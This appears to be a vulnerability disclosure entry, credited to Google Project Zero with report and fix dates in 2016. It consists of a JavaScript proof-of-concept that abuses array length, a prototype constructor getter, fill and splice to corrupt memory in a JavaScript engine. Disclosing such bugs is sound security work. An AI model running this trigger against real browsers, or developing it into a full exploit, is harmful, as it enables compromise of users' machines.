- Report: Sep 2016
- Fix: Nov 2016
- Credit: Natalie Silvanovich, Google Project Zero
var a = [];
class dummy{}
a.length = 200000;
a.fill(7, 10000, 10200);
var o = {};
Object.defineProperty(o, 'constructor', {
get: function() {
a.length = 0xfffffffe;
var k = [];
k.fill.call(a, 7.7, 0xfffff000, 0xfffffffe);
return dummy;
}
});
a.__proto__ = o;
var q = [];
q.length = 500;
q.fill(7.7);
var j = [];
a.length = 0xfffffffe - 500;
j.splice.call(a, 0, ...q);
a[0xfffff1ec - 1] = 10;